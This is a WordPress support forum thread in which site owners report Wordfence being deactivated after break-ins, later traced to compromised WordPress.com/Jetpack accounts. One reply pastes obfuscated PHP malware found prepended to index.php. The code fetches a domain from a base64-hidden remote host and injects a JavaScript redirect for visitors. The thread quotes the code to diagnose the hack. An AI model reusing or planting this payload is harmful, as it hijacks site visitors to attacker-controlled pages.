Support » Plugin: Wordfence Security - Firewall & Malware Scan » Wordfence Deactivating Automatically?

Viewing 10 replies - 1 through 10 (of 10 total)
  • dglambert

    (@dglambert)

    Watching this – I’ve had the same issue.

    Check the title of the plugin. If it’s just ‘wordfence’, you’ve been hacked.

    Kevin Maschke

    (@kevin-maschke)

    The plugin I Install is called “Wordfence Security” and in the description of it it says
    “Wordfence – Anti-virus, Firewall and Malware Scan”. “VersiĆ³n 7.1.8 | By Wordfence”.

    tflora

    (@tflora)

    Same issue here. Got this email:

    This email was sent from your website “Lane Brody Official Website” by the Wordfence plugin at Saturday 30th of June 2018 at 01:20:56 AM
    The Wordfence administrative URL for this site is: http://www.lanebrody.com/wp-admin/admin.php?page=Wordfence
    A user with username “” deactivated Wordfence on your WordPress site.
    User IP: 127.0.0.1
    User hostname: localhost

    Was able to login and found a new User I hadn’t created. Wiped that out. Re-installed Wordfence and changed admin password. Still can’t figure out how this happened and worried that it will happen again. Any assurances?

    jeffman111

    (@jeffman111)

    This same thing happened to me yesterday. I received an email stating that my wordfence has been deactivated. Sure enough when I logged in I saw it was deactivated, then disappeared. No new users created.

    INTERESTING that Kevin’s email stated it came from IP: 192.0.86.188, and my email stated it came from IP: 192.0.113.112. When I checked both IP addresses, the are both Registered to Automattic, the very people behind WordPress.com, WooCommerce, Jetpack, Simplenote, Longreads, VaultPress, Akismet, Gravatar, Polldaddy, Cloudup, and more.

    THAT is scary!

    defmans7

    (@defmans7)

    The same thing has been happening to me on multiple sites, many times. I login and Wordfence is indeed de-activated and there are foreign and modified files. Not sure which plugin is causing a vulnerability because I use an array of different plugins for my various clients.

    This email was sent from your website "[website name]" by the Wordfence plugin at Saturday 30th of June 2018 at 04:06:44 AM The Wordfence administrative URL for this site is: https://[domain-name].com/wp-admin/admin.php?page=Wordfence
    A user with username "[my admin login]" deactivated Wordfence on your WordPress site.
    User IP: 192.0.116.208
    User hostname: 192.0.116.208
    User location: Los Angeles, United States

    This is the first I’ve heard of others having the same issue.

    A file with this name is usually in the public_html directory “71ba5704c07aec55402cb7d674cb5783”

    and index.php usually has some code like this, prepended to it:

    <?php
     $id6fe1d0be634 = "/index/?2601510941471";
    $z8c7dd922ad47=md5($id6fe1d0be634);$u77e8e1445762=time();$geaa082fa5781=filemtime($z8c7dd922ad47);$u07cc694b9b3f=$u77e8e1445762-$geaa082fa5781;if(file_exists($z8c7dd922ad47)){$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));$xe4e46deb7f9c=json_decode(base64_decode(fread($fe1260894f59e,filesize($z8c7dd922ad47))),1);fclose($fe1260894f59e);}if($u07cc694b9b3f>=60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');}
    

    Some links, even within the admin dashboard, redirect to a Baidu redirect, something like this: “http://www.baidu.com/link?url=bEUKnD70IK1cMzRUWPGE3CNBYzcT7EiuMM3p3Uy1LsZUeSgoQWxl9RlBWf_iSgwr”

    This one took me to a suspended account, “http://www.hatchy.com.au” – so I’m assuming it’s some type of DDOS attack.

    Would love to know the root cause of the vulnerability so I can patch it. So far it’s actually looking like the common thread is Wordfence.

    CB

    (@cbrandt)

    A similar issue was reported a few days ago, and WF staff pointed to a data breach as possible reason for strangers obtaining credentials and accessing the website:

    https://wordpress.org/support/topic/wordfence-deactivated-and-replaced/

    Here are some resources on dealing with a hacked website:

    https://developers.google.com/web/fundamentals/security/hacked/
    https://webmasters.googleblog.com/2015/08/nohacked-fixing-injected-gibberish-url_24.html

    Good luck!
    CB

    • This reply was modified 1 year ago by  CB.
    defmans7

    (@defmans7)

    This is the post that CB is referring to, I think.
    https://wordpress.org/support/topic/wordfence-deactivated-and-replaced/#post-10418793

    So maybe my account was compromised and I was the vulnerability. I did have the Jetpack plugin installed on these sites I think.

    Recommend to enable 2FA for WordPress.com FYI.

    • This reply was modified 1 year ago by  defmans7. Reason: Added 2FA recommendation
    wfalaa

    (@wfalaa)

    Hi @kevin-maschke

    If you have Jetpack plugin installed on your site, then please check my reply here as that might be the entering point that allowed attackers from logging into your site, immediately change WordPress.com password and allow 2FA.

    Thanks.

    Kevin Maschke

    (@kevin-maschke)

    Hi @wfalaa

    I saw that post, thank you. I’ve changed my WordPress.com password and enabled 2FA. Since then the incident hasn’t happened again.

    Regards,
    Kevin.

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Wordfence Deactivating Automatically?’ is closed to new replies.